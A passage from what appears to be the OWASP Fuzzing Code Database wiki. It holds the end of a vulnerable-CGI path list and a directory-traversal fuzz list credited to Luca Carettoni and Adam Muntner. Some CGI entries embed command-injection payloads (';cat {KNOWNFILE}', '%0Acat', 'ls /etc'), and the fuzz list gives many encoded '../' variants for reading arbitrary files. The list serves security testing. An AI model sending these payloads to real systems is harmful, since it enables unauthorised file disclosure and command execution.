webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
